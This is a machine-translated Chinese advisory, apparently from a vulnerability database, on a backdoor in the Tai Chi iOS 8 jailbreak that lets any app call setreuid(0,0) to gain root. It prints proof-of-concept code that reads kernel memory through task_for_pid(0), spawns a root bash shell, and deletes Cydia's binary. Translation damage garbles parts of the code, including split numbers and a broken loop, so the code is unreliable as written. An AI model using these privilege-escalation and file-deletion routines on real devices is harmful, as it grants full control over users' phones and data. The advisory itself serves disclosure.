Tai Chi jailbreak major security Backdoor-vulnerability warning-the black bar safety net

ID MYHACK58:62201564287
Type myhack58
Reporter 佚名
Modified 2015-07-03T00:00:00


Tai Chi jailbreak iOS8. 1. 3-8. 4 contains a major security back door, escape after causing any the APP can extract right to the Root, thereby affecting the user data safe. For example to obtain Root permission after full control of system files, and even further to install Trojans and other serious threats to user security malware. 0x01 details Specific analysis showed that the Tai Chi jailbreak modify the setreuid this key system API, causing any APP can directly call the setreuid(0,0)to get the Root execution permissions, so you can modify any system files, you can also task_for_pid open system kernel to handle to fully control the system bottom. For example, by writing to the system directory“/Library/LaunchDaemons”can register a system service, so that the implant Trojans, viruses, hacking tools threats to the user privacy data and password. Vulnerability recreate the demo as shown below: ! Example A: by test_taig_backdoor1 the program read kernel memory ! Example two: by test_taig_backdoor2 get root access shell test_taig_backdoor read arbitrary kernel poc code:









void dump_kernel_memory(vm_address_t addr) { kern_return_t kret; mach_port_t proc_task = 0; vm_size_t ret_size = 0; vm_size_t i; char buffer[1 2 8] = {0}; int ret;

ret = task_for_pid(mach_task_self(), 0, &proc_task); if (ret != 0) { NSLog(@"[err] get tfp0 fail: %d", ret); return; }

NSLog(@"task for pid 0 = %u", proc_task);

kret = vm_read_overwrite(proc_task, addr, sizeof(buffer), (vm_address_t)buffer, &ret_size);

char *info = malloc(4 0 9 6); info[0] = '\0';

for (i = 0; i { if (i % 1 of 6 == 0) sprintf(info + strlen(info), "\n%p: ", (void )(addr + i)); sprintf(info + strlen(info), "0x%02x ", (uint8_t*)(buffer + i)); } NSLog(@"%s", info);

free(info); }

int main (int argc, const char * argv[]) { if (argc != 2) { NSLog(@"%s [kernel_address]", argv[0]); return 0; }

NSLog(@"current uid=%d EUID has been=%d", getuid(), geteuid());

/ * taig virus test /


NSLog(@"now uid=%d EUID has been=%d", getuid(), geteuid());

vm_address_t addr = strtoul(argv[1], NULL, 1 6); dump_kernel_memory(addr);

return 0; } test_taig_backdoor2 provide the right poc code: void get_root_shell { setreuid(0,0); system("/bin/bash-i"); } In the APP, add the following code to delete file test carefully executed to: void testBackdoor() { NSLog(@"currently running process uid=%d EUID has been=%d", getuid(), geteuid()); setreuid(0,0); NSLog(@"the back door to mention the right after the current running process uid=%d EUID has been=%d", getuid(), geteuid());

NSLog(@"delete any file a demo of the test will result in Cydia not run, please carefully executed"); unlink("/Applications/Cydia. app/MobileCydia"); } Tai Chi jailbreak iOS8. 0-8. 1. 1 failed to find the machine to be tested, may also have this major back door. 0x02 summary Jailbreak software in the possession of a security Backdoor is not without precedent. As early as for the iOS 7 untethered jailbreak tool evasi0n7, the jailbreak developer evad3rs will modify No. 0 system call, resulting in any app you can easily get the kernel code to perform the ability. This practice also caused the prison break great God winocm strong dissatisfaction(http://winocm.moe/projects/research/2014/01/11/evading-ios-security/a). Back in 2 0 1 4 year of Winocm in the blog post, it has been questioned Tai Chi is in the use of this back door. Tai Chi jailbreak and evad3rs“gossip”has been without interruption. According to Forbes reports http://www.forbes.com/sites/thomasbrewster/2015/06/26/china-iphone-jailbreak-industry/)(http://mobile.163.com/15/0630/10/ATBNV93H0011671M.html, the Tai Chi has to pay the evad3rs up to a million dollars for the jailbreak for the development of cooperation, the cooperation of the product is evasi0n7 mandatory installation of“Tai Chi assistant”farce. As for the Tai Chi jailbreak security back door is a“recidivism”or“first offense”the answer probably will not be able to uncover.